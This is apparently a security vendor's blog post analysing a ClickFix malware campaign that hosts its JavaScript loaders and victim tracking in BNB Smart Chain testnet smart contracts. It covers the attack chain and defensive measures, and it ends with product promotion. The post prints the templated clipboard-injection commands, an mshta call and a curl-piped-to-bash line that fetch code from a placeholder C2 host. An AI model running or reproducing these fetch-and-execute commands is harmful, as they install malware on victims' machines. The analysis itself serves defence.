Blog Post

Malware Goes On-Chain! Uncovering ClickFix’s Hidden C2 on BNB Smart Chain

February 22, 2026
The AnChain.AI team uncovered a novel ClickFix malware command-and-control (C2) infrastructure hosted on the BNB Smart Chain. To our knowledge, this is the first time this tactic has been fully deconstructed and publicly demystified.

ClickFix malware has evolved from a straightforward social engineering technique into a resilient, decentralized malware delivery ecosystem. While recent research from Microsoft and Darktrace documents how fake CAPTCHA lures trick users into manually executing malicious commands, AnChain.AI’s latest investigation reveals a more consequential architectural shift:

The malware command-and-control (C2) infrastructure itself has moved on-chain.

In February 2026, AnChain.AI identified an active ClickFix campaign leveraging BNB Smart Chain testnet smart contracts as a distributed payload router. Rather than relying solely on traditional VPS hosting, bulletproof servers, or compromised CMS infrastructure, the operators embedded Base64-encoded JavaScript loaders directly within smart contract storage — transforming blockchain into a persistent, low-cost staging layer for malware delivery.

This report covers:

  • ClickFix attack mechanics
  • On-chain C2 infrastructure
  • Smart contract payload analysis
  • Key IOCs
  • Defensive strategies
  • Disrupting ransomware monetization with blockchain intelligence

ClickFix malware attack flow on Microsoft Windows, with real world artifacts we identified during our investigation. Note that the fake Captcha window could be various forms.

How ClickFix Malware Works

Social Engineering as Execution

ClickFix is a user-assisted execution technique. Victims are tricked to perform:

  1. Press Win + R (Windows) or open Terminal (macOS)
  2. Paste a command copied from the browser
  3. Execute it manually

No exploit kit is required. No macro-enabled document is needed. The victim becomes the execution mechanism.

Microsoft describes this pattern as particularly dangerous because it bypasses many traditional automated detection controls. Darktrace further observed that fake CAPTCHA overlays are increasingly used to deliver clipboard-injected commands under the guise of “human verification.”

Observed Attack Flow 

AnChain.AI team managed to map the following attack chain :

  1. Victim visits compromised website
  2. Injected JavaScript calls get() on a BNB Smart Chain testnet contract
  3. Base64-encoded JavaScript loader is returned
  4. Loader detects victim OS
  5. OS-specific payload contract is queried
  6. Fake reCAPTCHA interface is rendered
  7. Clipboard is overwritten with malicious command
  8. Victim executes:
    • Windows: mshta http://...
    • macOS: curl | bash
  9. Victim UUID is registered on-chain

The key innovation:

Payload staging is decentralized via smart contracts.

BNB Smart Chain C2 Architecture

By leveraging AnChain.AI’s threat intelligence platform and AI-driven investigation agents, we were able to systematically demystify the command-and-control (C2) infrastructure deployed on BNB Smart Chain — specifically the testnet, not mainnet.

The operators demonstrate a technically sophisticated approach to building resilient, low-cost C2 infrastructure. By embedding payload logic directly within smart contracts, they eliminate reliance on traditional hosting layers. This marks a structural departure from earlier-generation malware C2 models, which typically depended on bulletproof hosting providers, compromised servers, or rotating infected endpoints.

In contrast, blockchain-based staging offers:

  • Infrastructure persistence & Takedown resistance  - BNB blockchain
  • Reduced hosting costs - Low gas fee on BNB
  • EVM compatibility - Easier to develop and deloy
  • Lower operational visibility when deployed on testnet environments - Few blockchain anlaytics companies monitor BNB test net. 

This evolution reflects a broader trend: malware infrastructure is becoming decentralized, programmable, and economically optimized.

The Input Data field of the ClickFix malicious BNB smart contract for C2 purpose, which is encoded in Base64. The decoded payload will be presented in next section.

Root Router Contract

Address:
0xA1de..
Network: BNB Smart Chain Testnet (chainId 97)

The router contract:

  • Stores Base64-encoded JavaScript in storage
  • Exposes public get() for payload retrieval
  • Uses eth_call for read-only delivery
  • Branches by OS detection

Routing logic:

  • Windows → 0x4679...
  • macOS → 0x68Dc...

Three-Tier Smart Contract Model

Tier Function Description
Tier 1 Root Router Detects victim operating system and redirects to the appropriate payload contract.
Tier 2 OS Payload Delivers fake CAPTCHA interface and performs clipboard injection to trigger manual execution.
Tier 3 Tracking Registry Records victim UUIDs on-chain to track confirmed infections.

Notably:

  • No owner restriction on registration functions
  • Any address can register or remove UUIDs
  • On-chain telemetry confirms active infections

Eight confirmed victim registrations were observed in a single day . Reads remain invisible; actual infection counts are likely higher.

Smart Contract Payload Analysis

Decoding (Base64) the ClickFix malicious payload from the BNB C2 smart contract reveals this below JavaScript code snippet: 

Anti-Analysis Controls

  • Headless browser detection (Malware checks WebDriver, HeadlessChrome, PhantomJS, Puppeteer, Playwright)
  • WebDriver detection
  • Sandbox avoidance
  • Zero-dimension window detection

Fake reCAPTCHA Overlay

  • Official reCAPTCHA logo
  • Structured HTML/CSS mimicry
  • Randomized CSS classes per update (polymorphic design)

Clipboard Injection

Windows execution vector:

mshta http://<victim_id>.<C2_domain>/?=check&&actmn=<random>

macOS execution vector:

/bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL '<victim_id>.<C2_domain>/?=check&&actmn=<random>')"

Victim Tracking

  • Windows victims identified via external IP resolution
  • macOS victims assigned random 8-character UUID
  • register() calls visible on-chain

C2 Infrastructure Evolution

AnChain.AI team is able to  trace this ClickFix BNB Smart Chain C2 infrastructure back to May 2025 prototype contracts, and other network artifacts.

Key evolution:

Feature Early Phase Current Phase
Architecture Single contract Three-tier router
OS Support Windows Windows + macOS
Payload Updates Weekly Every 10–15 minutes
Obfuscation Moderate Heavy polymorphism
Tracking Static Actively maintained

Operator EOA shows sustained activity and funding chain development.

This infrastructure is not experimental. It is operational.

Indicators of Compromise (IOCs) Examples

Below is a representative sample of IOCs identified through the AnChain.AI platform. A comprehensive list is available to qualified customers upon request.

Defensive Considerations

User Awareness

  • Never execute commands provided by web prompts
  • Treat CAPTCHA pages requesting terminal interaction as malicious
  • Restrict clipboard write permissions where feasible

Endpoint & Network Controls

  • Monitor RunMRU registry entries
  • Detect abnormal PowerShell and mshta usage
  • Flag unexpected JavaScript loading Web3 libraries
  • Monitor unusual RPC calls to BNB Smart Chain testnet endpoints

Blockchain Intelligence

Traditional EDR does not monitor:

  • Smart contract payload hosting
  • On-chain victim telemetry
  • Operator wallet funding chains

Modern ransomware defense must include blockchain visibility, such as integrating with AnChain.AI API: https://www.anchain.ai/data

Strategic Implications

ClickFix is no longer solely a phishing technique.

It represents:

  • Social engineering exploitation
  • Decentralized C2 deployment
  • On-chain telemetry tracking
  • Crypto-enabled monetization potential

Ransomware infrastructure is shifting from centralized hosting to decentralized smart contracts. Defensive models must adapt accordingly.

As illustrated below, the ClickFix malware economy begins with social engineering — deceiving users into executing malicious commands delivered from a BNB Smart Chain–based C2 infrastructure. However, this represents only the initial phase of the attack lifecycle. Once systems are encrypted or data is exfiltrated, victims are directed to pay ransom demands in cryptocurrency, typically Bitcoin or Ethereum. From there, the process transitions into two critical stages: ransom payment and subsequent crypto laundering, where funds are layered, obfuscated, and ultimately off-ramped into fiat or alternative assets.

How AnChain.AI  Can Help

AnChain.AI supports investigations involving smart contract–based C2 infrastructure, crypto ransom payments, and on-chain obfuscation. Our platform combines smart contract analytics, wallet tracing, ransom transaction analysis, exchange off-ramp identification, and FinCEN-aligned reporting workflows.

Modern ransomware operations span Web2 intrusion and Web3 infrastructure. Effective response requires visibility across both technical compromise and financial movement.

Schedule a call with our experts: https://www.anchain.ai/demo